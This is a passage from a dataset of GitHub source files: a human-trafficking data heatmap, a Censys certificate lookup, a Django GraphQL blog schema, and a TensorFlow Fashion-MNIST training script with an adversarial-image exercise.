"common.helpers.paged_items", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "tools.models.Tools.objects.filter", "line_number": 24, "usage_type": "call"}, {"api_name": "tools.models.Tools.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tools.models.Tools", "line_number": 24, "usage_type": "name"}, {"api_name": "common.pc_m.judge_pc_or_mobile", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "38768996814", "text": "import pandas as pd\r\nimport numpy as np\r\nimport pyarrow.feather as feather\r\nimport plotly.express as pl\r\nimport plotly.graph_objects as go\r\n\r\n# creates a new df to change df_ht ISO2 to ISO3 for plotly\r\niso_data = pd.read_feather(r\"C:\\DataSci\\Projects\\Data Practice\\ht_region_lookup.ft\")\r\niso_data = iso_data[['ISO2', 'ISO3']]\r\n# converts df to dict for easy replace function\r\niso_dict = dict(iso_data.values)\r\n\r\n# creates new df_ht\r\ndf_ht = pd.read_feather(r\"C:\\DataSci\\Projects\\Data Practice\\ht.ft\")\r\n# replaces ISO2 to ISO3 for citizenship\r\ndf_ht = df_ht.replace({\"citizenship\": iso_dict})\r\n\r\nbool_names = [ 'majorityStatusAtExploit', 'majorityEntry', 'meansOfControlDebtBondage', \r\n 'meansOfControlTakesEarnings', 'meansOfControlRestrictsFinancialAccess', 'meansOfControlThreats', 'meansOfControlPsychologicalAbuse', 'meansOfControlPhysicalAbuse', \r\n 'meansOfControlSexualAbuse', 'meansOfControlFalsePromises', 'meansOfControlPsychoactiveSubstances', 'meansOfControlRestrictsMovement', \r\n 'meansOfControlRestrictsMedicalCare', 'meansOfControlExcessiveWorkingHours', 'meansOfControlUsesChildren', 'meansOfControlThreatOfLawEnforcement', \r\n 'meansOfControlWithholdsNecessities', 'meansOfControlWithholdsDocuments', 'meansOfControlOther', 'meansOfControlNotSpecified', \r\n 'isForcedLabour', 'isSexualExploit', 'isOtherExploit', 'isSexAndLabour', 'isForcedMarriage', 'isForcedMilitary', 'isOrganRemoval', 'isSlaveryAndPractices', \r\n 'typeOfLabourAgriculture', 'typeOfLabourAquafarming', 'typeOfLabourBegging', 'typeOfLabourConstruction', 'typeOfLabourDomesticWork', \r\n 'typeOfLabourHospitality', 'typeOfLabourIllicitActivities', 'typeOfLabourManufacturing', 'typeOfLabourMiningOrDrilling', 'typeOfLabourPeddling', \r\n 'typeOfLabourTransportation', 'typeOfLabourOther', 'typeOfLabourNotSpecified', 'typeOfSexProstitution', 'typeOfSexPornography', \r\n 'typeOfSexRemoteInteractiveServices', 'typeOfSexPrivateSexualServices', 'isAbduction', 'recruiterRelationIntimatePartner', \r\n 'recruiterRelationFriend', 'recruiterRelationFamily', 'recruiterRelationOther', 'recruiterRelationUnknown']\r\ncol_categ = ['Datasource', 'gender', 'ageBroad', 'majorityStatus', 'citizenship','yearOfRegistration','RecruiterRelationship', 'CountryOfExploitation', ]\r\ncitizenship= ([])\r\ndrop_col = ['gender', 'ageBroad', 'typeOfExploitConcatenated', 'meansOfControlConcatenated', 'typeOfLabourConcatenated', 'typeOfSexConcatenated']\r\n\r\n\r\ndef main():\r\n \"\"\"main function\"\"\"\r\n # change last two parameters to change what years you want to look between\r\n # leave last one blank for just one year\r\n make_df_year(df_ht, 2002, 2021)\r\n\r\ndef make_map(df, year:str):\r\n \"\"\"Given dataframe ir will make the world heat map\"\"\"\r\n # creates figure\r\n fig = go.Figure(data=go.Choropleth(locations = df['citizenship'], z = df['Count'], colorscale='Inferno', autocolorscale=True))\r\n # changes title\r\n fig.update_layout(title={'text':f'Human-Trafficking Heatmap based on victims citizenship for {year}'})\r\n fig.show()\r\n return\r\n\r\ndef make_df_year(df, start_y, ending_y = 0):\r\n \"\"\"Given the year it will make a dataframe with only the given year\"\"\"\r\n years = []\r\n # make list of available years to check the input is correct\r\n for year in np.sort(df['yearOfRegistration'].unique()):\r\n years.append(year)\r\n # print(f'years list: {years}')\r\n # check if only one year\r\n if ending_y == 0:\r\n if start_y in years:\r\n year_df = 
df.loc[df['yearOfRegistration'] == start_y]\r\n year_df = year_df.groupby(['citizenship'])['citizenship'].count().reset_index(name='Count')\r\n make_map(year_df, str(start_y))\r\n return\r\n else:\r\n print(\"Can't\")\r\n # between years\r\n else:\r\n if start_y in years and ending_y in years:\r\n year_df = df[df['yearOfRegistration'].between(start_y, ending_y)]\r\n year_df = year_df.groupby(['citizenship'])['citizenship'].count().reset_index(name='Count')\r\n make_map(year_df, f'{start_y} to {ending_y}')\r\n return\r\n else:\r\n print(\"Can't\")\r\n\r\nmain()", "repo_name": "cmonitt/Human_Trafficking", "sub_path": "human_trafficking.py", "file_name": "human_trafficking.py", "file_ext": "py", "file_size_in_byte": 4265, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_feather", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.read_feather", "line_number": 14, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 43, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 43, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Choropleth", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "16839175316", "text": "from censys.search import CensysCertificates\nimport datetime\nimport csv\n\n\nc = CensysCertificates()\n\nnow = datetime.datetime.now()\n\nfields_to_retrieve = [\n \"parsed.subject_dn\",\n \"parsed.names\",\n \"parsed.subject.common_name\",\n \"parsed.fingerprint_sha256\",\n \"parsed.validity.start\",\n \"parsed.validity.end\",\n]\n\n\ncertificate_list = []\nheader = [\"SHA256 fingerprint\", \"Validity Start\", \"Validity End\"]\n\n\ndef create_csv():\n with open('censys.csv', 'w', encoding='UTF8', newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerow(header)\n for certificate in certificate_list:\n writer.writerow(certificate)\n\n\ndef censys_certificates():\n for page in c.search(\"parsed.names: censys.io and tags: trusted\", fields_to_retrieve):\n subject_dn = page[\"parsed.subject_dn\"]\n names = page[\"parsed.names\"]\n validity_start = page[\"parsed.validity.start\"]\n validity_end = page[\"parsed.validity.end\"]\n sha256 = page[\"parsed.fingerprint_sha256\"]\n \n censys_domain_flag = 0\n\n if \"censys.io\".lower() in subject_dn.lower():\n censys_domain_flag = 1\n else:\n for name in names:\n if \"censys.io\".lower() in name.lower():\n censys_domain_flag = 1\n break\n \n validity_end_dt = datetime.datetime.strptime(validity_end, \"%Y-%m-%dT%H:%M:%SZ\")\n\n\n if censys_domain_flag and validity_end_dt >= now:\n certificate_list.append([sha256, str(validity_start), str(validity_end)])\n\n\n\nif __name__ == \"__main__\":\n censys_certificates()\n create_csv()", "repo_name": "SaiVikhyath/Censys-Project", "sub_path": "censys_project.py", "file_name": "censys_project.py", "file_ext": "py", "file_size_in_byte": 1628, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "censys.search.CensysCertificates", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 8, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 50, "usage_type": "attribute"}]}
+{"seq_id": "31977930526", "text": "import graphene\nfrom .types import BlogType\nfrom .models import Blog\nfrom users.models import CustomUser as User\nimport json\n\nclass BlogQuery(graphene.ObjectType):\n blogs = graphene.List(BlogType)\n blog = graphene.Field(BlogType, id=graphene.ID(required=True))\n user_blogs = graphene.List(BlogType, id=graphene.ID(required=True))\n\n def resolve_blogs(parent, info):\n return Blog.objects.all()\n \n def resolve_blog(parent, info, id):\n return Blog.objects.get(pk=id)\n\n def resolve_user_blogs(parent, info, id):\n author = User.objects.get(pk=id)\n return Blog.objects.filter(author=author)\n \nclass CreateBlogMutation(graphene.Mutation):\n class Arguments:\n title = graphene.String(required=True)\n data = graphene.String(required=True)\n tags = graphene.List(graphene.String)\n more_info = graphene.JSONString()\n \n blog = graphene.Field(BlogType)\n\n @classmethod\n def mutate(cls, root, info, title, data, tags, more_info):\n user = info.context.user\n if(user.is_authenticated):\n author = User.objects.get(pk=user.id)\n blog = Blog(author=author, title=title, data=data, tags=tags, more_info=more_info)\n blog.save()\n return CreateBlogMutation(blog=blog)\n\n raise Exception(\"You need to login to access the api\")\n\nclass UpdateBlogMutation(graphene.Mutation):\n class Arguments:\n id = graphene.ID(required=True)\n title = graphene.String(required=False)\n data = graphene.String(required=False)\n tags = graphene.List(graphene.String, required=False)\n more_info = graphene.JSONString(required=False)\n \n blog = graphene.Field(BlogType)\n\n @classmethod\n def mutate(cls, root, info, id, title=None, data=None, tags=None, more_info=None):\n user = info.context.user\n\n if(user.is_authenticated):\n blog = Blog.objects.get(pk=id)\n \n if(blog.is_project_blog):\n raise Exception(\"This action is forbid on this endpoint.\")\n if(blog.author == user):\n if title is not None:\n blog.title = title\n \n if data is not None:\n blog.data = data\n\n if tags is not None:\n blog.tags = tags\n \n if more_info is not None:\n blog.more_info = more_info\n\n blog.save()\n return UpdateBlogMutation(blog=blog)\n raise Exception(\"You don't have permissions to perform this operation\")\n raise Exception(\"You have to be logged in to access api\")\n\nclass DeleteBlogMutation(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n \n response = graphene.JSONString()\n\n @classmethod\n def mutate(cls, root, info, id):\n user = info.context.user\n\n if(user.is_authenticated):\n blog = Blog.objects.get(pk=id)\n if(blog.is_project_blog):\n raise Exception(\"This action is forbid on this endpoint.\")\n if(blog.author == user):\n blog.delete()\n response = {\n \"success\": True,\n \"error\": False\n }\n return DeleteBlogMutation(response=json.dumps(response))\n raise Exception(\"You don't have permissions to perform this operation\")\n raise Exception(\"You have to logged in to access api\")\n", "repo_name": "sleepingsaint/project-scope", "sub_path": "blogs/schema.py", "file_name": "schema.py", "file_ext": "py", "file_size_in_byte": 3505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "graphene.ObjectType", "line_number": 7, "usage_type": "attribute"}, {"api_name": "graphene.List", "line_number": 8, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 8, "usage_type": "argument"}, {"api_name": "graphene.Field", "line_number": 9, "usage_type": "call"}, {"api_name": 
"types.BlogType", "line_number": 9, "usage_type": "argument"}, {"api_name": "graphene.ID", "line_number": 9, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 10, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 10, "usage_type": "argument"}, {"api_name": "graphene.ID", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Blog.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 13, "usage_type": "name"}, {"api_name": "models.Blog.objects.get", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 16, "usage_type": "name"}, {"api_name": "users.models.CustomUser.objects.get", "line_number": 19, "usage_type": "call"}, {"api_name": "users.models.CustomUser.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "users.models.CustomUser", "line_number": 19, "usage_type": "name"}, {"api_name": "models.Blog.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 20, "usage_type": "name"}, {"api_name": "graphene.Mutation", "line_number": 22, "usage_type": "attribute"}, {"api_name": "graphene.String", "line_number": 24, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 25, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 26, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 26, "usage_type": "attribute"}, {"api_name": "graphene.JSONString", "line_number": 27, "usage_type": "call"}, {"api_name": "graphene.Field", "line_number": 29, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 29, "usage_type": "argument"}, {"api_name": "users.models.CustomUser.objects.get", "line_number": 35, "usage_type": "call"}, {"api_name": "users.models.CustomUser.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "users.models.CustomUser", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Blog", "line_number": 36, "usage_type": "call"}, {"api_name": "graphene.Mutation", "line_number": 42, "usage_type": "attribute"}, {"api_name": "graphene.ID", "line_number": 44, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 45, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 46, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 47, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 47, "usage_type": "attribute"}, {"api_name": "graphene.JSONString", "line_number": 48, "usage_type": "call"}, {"api_name": "graphene.Field", "line_number": 50, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 50, "usage_type": "argument"}, {"api_name": "models.Blog.objects.get", "line_number": 57, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 57, "usage_type": "name"}, {"api_name": "graphene.Mutation", "line_number": 79, "usage_type": "attribute"}, {"api_name": "graphene.ID", "line_number": 81, "usage_type": "call"}, {"api_name": "graphene.JSONString", "line_number": 83, "usage_type": "call"}, {"api_name": "models.Blog.objects.get", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 
90, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 90, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 99, "usage_type": "call"}]}
+{"seq_id": "7183277752", "text": "import datetime\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nfrom model import mlp, conv_net\n\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\nnum_steps = 100000\nprint_steps = 1000\nsave_checkpoint_steps = 1000\n\n\ndef get_data():\n \"\"\"\n Get the Fashion MNIST dataset, in the proper data-types and shapes.\n The images are transformed from uint8 in 0,...,255 to float in [0,1].\n The labels are transformed from uint8 to int32.\n \"\"\"\n from tensorflow.keras.datasets import fashion_mnist\n (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n n_train, h, w = x_train.shape\n n_test = x_test.shape[0]\n n_labels = len(np.unique(y_train))\n\n # Reshape the images to include a channels dimension (which is 1),\n # convert them to float32 and divide by 255 to get a value between 0 and 1\n x_train = x_train.reshape(-1, h, w, 1).astype(np.float32) / 255.0\n x_test = x_test.reshape(-1, h, w, 1).astype(np.float32) / 255.0\n\n # Convert the labels to int32 and not uint8, because this is what\n # TensorFlow wants (in the loss function sparse_softmax_cross_entropy_with_logits).\n y_train = y_train.astype(np.int32)\n y_test = y_test.astype(np.int32)\n\n return x_train, y_train, x_test, y_test, n_train, n_test, n_labels, h, w\n\n\ndef train(model_fn, batch_size, learning_rate=None, **model_kwargs):\n \"\"\"\n load FashionMNIST data.\n create model using model_fn, and train it on FashionMNIST.\n :param model_fn: a function to create the model (should be one of the functions from model.py)\n :param batch_size: the batch size for the training\n :param learning_rate: optional parameter - option to specify learning rate for the optimizer.\n :return:\n \"\"\"\n x_train, y_train, x_test, y_test, n_train, n_test, n_labels, h, w = get_data()\n\n x = tf.placeholder(dtype=tf.float32, shape=(None, h, w, 1), name='x')\n y = tf.placeholder(dtype=tf.int32, shape=(None,), name='y')\n test_mode = tf.placeholder_with_default(\n input=tf.constant(value=False, dtype=tf.bool, shape=(), name='test_mode_default'),\n shape=(),\n name='test_mode'\n )\n\n # Define the model.\n model_kwargs['test_mode'] = test_mode\n y_predict = model_fn(x, n_labels, **model_kwargs)\n\n # Define the loss function.\n loss = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=y, logits=y_predict, name='non_reduced_loss'),\n name='reduced_loss'\n )\n\n # Define the optimizer.\n optimizer_kwargs = dict() if learning_rate is None else {'learning_rate': learning_rate}\n optimizer = tf.train.AdamOptimizer(**optimizer_kwargs).minimize(loss)\n\n # Define accuracy operator.\n correct_pred = tf.equal(tf.cast(tf.argmax(y_predict, axis=1), tf.int32), y)\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n # Add loss and accuracy to the summary, in order to view it in TensorBoard.\n tf.summary.scalar('loss', loss)\n tf.summary.scalar('accuracy', accuracy)\n summarize = tf.summary.merge_all()\n\n # Collect losses and accuracies, both for train-data and for test-data.\n train_losses = list()\n train_accuracies = list()\n test_losses = list()\n test_accuracies = list()\n\n init = tf.global_variables_initializer()\n\n # Define the directories that will be created with the TensorBoard data and checkpoints.\n now_str = datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\n logs_dir_name = os.path.join('logs', model_fn.__name__, now_str)\n 
checkpoint_directory = os.path.join(logs_dir_name, 'checkpoints')\n    checkpoint_prefix = os.path.join(checkpoint_directory, \"ckpt\")\n    saver = tf.train.Saver(max_to_keep=num_steps)\n    train_writer = tf.summary.FileWriter(os.path.join(logs_dir_name, 'train'),\n                                         tf.get_default_graph())\n    test_writer = tf.summary.FileWriter(os.path.join(logs_dir_name, 'test'),\n                                        tf.get_default_graph())\n    with tf.Session() as sess:\n        sess.run(init)\n        for i in range(num_steps):\n            # Sample a random mini-batch of samples from the training data.\n            train_batch_indices = np.random.choice(n_train, size=batch_size)\n            x_train_batch = x_train[train_batch_indices]\n            y_train_batch = y_train[train_batch_indices]\n\n            # Run the graph in that mini-batch, including the optimizer to update the weights.\n            train_loss, train_accuracy, train_summary, _ = sess.run(\n                fetches=[loss, accuracy, summarize, optimizer],\n                feed_dict={x: x_train_batch, y: y_train_batch}\n            )\n\n            train_losses.append(train_loss)\n            train_accuracies.append(train_accuracy)\n            train_writer.add_summary(train_summary, i)\n\n            # Sample a random mini-batch of samples from the testing data.\n            test_batch_indices = np.random.choice(n_test, size=batch_size)\n            x_test_batch = x_test[test_batch_indices]\n            y_test_batch = y_test[test_batch_indices]\n\n            # Run the graph in that mini-batch, excluding the optimizer (to avoid\n            # updating the weights according to the test data, strictly forbidden :))\n            test_loss, test_accuracy, test_summary = sess.run(\n                fetches=[loss, accuracy, summarize],\n                feed_dict={x: x_test_batch, y: y_test_batch, test_mode: True}\n            )\n\n            test_losses.append(test_loss)\n            test_accuracies.append(test_accuracy)\n            test_writer.add_summary(test_summary, i)\n\n            # Every print_steps iterations print train and test loss.\n            if i % print_steps == 0:\n                print(\"Iter {:05d} train-loss {:.2f} train-accuracy {:.2f}\".format(i, train_loss, train_accuracy))\n                print(\"Iter {:05d} test-loss {:.2f} test-accuracy {:.2f}\".format(i, test_loss, test_accuracy))\n\n            # Every save_checkpoint_steps iterations save a checkpoint.\n            if i % save_checkpoint_steps == 0:\n                saver.save(sess, save_path=checkpoint_prefix, global_step=i)\n\n    # After the training was finished, load the latest checkpoint and evaluate the model on\n    # all samples in the test-data.\n    all_test_losses = list()\n    all_test_accuracies = list()\n    with tf.Session() as sess:\n        latest_checkpoint = tf.train.latest_checkpoint(checkpoint_directory)\n        new_saver = tf.train.import_meta_graph(latest_checkpoint + '.meta')\n        new_saver.restore(sess, latest_checkpoint)\n        for i in range(n_test // batch_size):\n            x_test_batch = x_test[i:i+batch_size]\n            y_test_batch = y_test[i:i+batch_size]\n\n            # Run the graph on that mini-batch, excluding the optimizer (no weight updates).\n            test_loss, test_accuracy = sess.run(\n                fetches=[loss, accuracy],\n                feed_dict={x: x_test_batch, y: y_test_batch}\n            )\n            all_test_losses.append(test_loss)\n            all_test_accuracies.append(test_accuracy)\n\n    all_test_loss = np.array(all_test_losses).mean()\n    all_test_accuracy = np.array(all_test_accuracies).mean()\n    print(\"Total test-loss {:.2f} test-accuracy {:.2f}\".format(all_test_loss, all_test_accuracy))\n\n    train_writer.close()\n    test_writer.close()\n\n\ndef find_adversarial_image(checkpoint):\n    \"\"\"\n    Finds and plots the original image with the true-label and prediction,\n    and the adversarial image with the (wrong) prediction.\n    :param checkpoint: A checkpoint of a trained model.\n    \"\"\"\n    x_train, y_train, x_test, y_test, n_train, n_test, n_labels, h, w = get_data()\n\n    # Load the saved graph.\n    new_saver = tf.train.import_meta_graph(checkpoint + '.meta')\n    graph = tf.get_default_graph()\n\n    # Extract the placeholders for the loaded graph,\n    # and create additional tensors which calculate the classes' probabilities\n    # and final class prediction (argmax of the probabilities).\n    x = graph.get_tensor_by_name('x:0')\n    y = graph.get_tensor_by_name('y:0')\n    test_mode = graph.get_tensor_by_name('test_mode:0')\n    predict_logits = graph.get_tensor_by_name('predict:0')\n    predict_prob = tf.nn.softmax(logits=predict_logits, axis=1)\n    # predict_class = tf.argmax(predict_prob, axis=1)\n    loss = graph.get_tensor_by_name('reduced_loss:0')\n\n    # Sample a random image from the training data, and sample a wrong label for it.\n    i = np.random.randint(n_train)\n    image = x_train[i]\n    true_label = y_train[i]\n    target_label = np.random.choice(list(set(np.arange(n_labels)) - {true_label}))\n\n    # Create the image-loss, which encourages the\n    # resulting image to stay close to the original one.\n    image_tensor = tf.constant(value=image, dtype=tf.float32, name='source_image')\n    image_loss = tf.reduce_mean(tf.abs(tf.subtract(x, image_tensor, name='sub'), 'abs'), name='image_loss')\n\n    # Define the new loss as the weighted sum of the original loss and the image-loss.\n    image_loss_weight = 0.05\n    new_loss = tf.add(loss, image_loss_weight * image_loss)\n\n    # Create a symbolic tensor calculating the gradient\n    # of the new loss with respect to the input image.\n    grad = tf.gradients(ys=new_loss, xs=[x])\n\n    curr_image = image.copy().reshape(1, 28, 28, 1)\n    orig_classes_prob = None\n    target_label_reshaped = np.array([target_label], dtype=np.int32)\n\n    with tf.Session() as sess:\n        new_saver.restore(sess, checkpoint)\n\n        for i in range(10000):\n            # Calculate the gradient with respect to the input image,\n            # as well as the predicted classes' probabilities.\n            grad_image, classes_prob = sess.run(\n                [grad, predict_prob],\n                feed_dict={x: curr_image, y: target_label_reshaped, test_mode: True}\n            )\n\n            # Take the relevant values, as sess.run returns a list of nested values...\n            grad_image = grad_image[0][0]\n            classes_prob = classes_prob[0]\n\n            # In case this is the first iteration, save the classes' probabilities\n            # as they are the original prediction.\n            if i == 0:\n                orig_classes_prob = np.copy(classes_prob)\n\n            # print('True/Target-label probabilities = {:.2f} ; {:.2f}'.format(classes_prob[target_label],\n            #                                                                  classes_prob[true_label]))\n\n            if classes_prob[target_label] > 0.95:\n                break\n\n            # Update the current-image with respect to the gradient of the new loss function.\n            # This makes the loss function decrease, so the prediction gets close to the target\n            # label, and the image remains not far from the original one.\n            learning_rate = 0.001\n            curr_image -= learning_rate * grad_image\n\n    # Plot the original image, the added noise, and the final adversarial image.\n    plt.subplot(1, 3, 1)\n    plt.axis('off')\n    plt.imshow(image[:, :, 0], cmap='gray')\n    plt.title('{}, w.p. {:.4f}'.format(class_names[true_label], orig_classes_prob[true_label]))\n\n    plt.subplot(1, 3, 2)\n    plt.axis('off')\n    plt.imshow(curr_image[0, :, :, 0] - image[:, :, 0], cmap='gray')\n    plt.title('Add noise...')\n\n    plt.subplot(1, 3, 3)\n    plt.axis('off')\n    plt.imshow(curr_image[0, :, :, 0], cmap='gray')\n    plt.title('{}, w.p. {:.4f}'.format(class_names[target_label], classes_prob[target_label]))\n    plt.show()\n\n\ndef main():\n    # train(mlp, 64)\n    # train(mlp, 64, dropout_rate=0.25)\n    # train(conv_net, 64)\n    train(conv_net, 64, dropout_rate=0.25)\n    # find_adversarial_image(checkpoint='logs/conv_net/2019_11_16_16_38_00_drop_025/checkpoints/ckpt-50000')\n    pass\n\n\nif __name__ == \"__main__\":\n    main()\n", "repo_name": "AlonNT/APML", "sub_path": "ex1/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 11872, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.keras.datasets.fashion_mnist.load_data", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.keras.datasets.fashion_mnist", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder_with_default", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.bool", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 81, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 82, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.merge_all", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 91, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "attribute"}, {"api_name": 
"os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 150, "usage_type": "call"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 151, "usage_type": "attribute"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 152, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 183, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 183, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 184, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 193, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 201, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 201, "usage_type": "call"}, {"api_name": 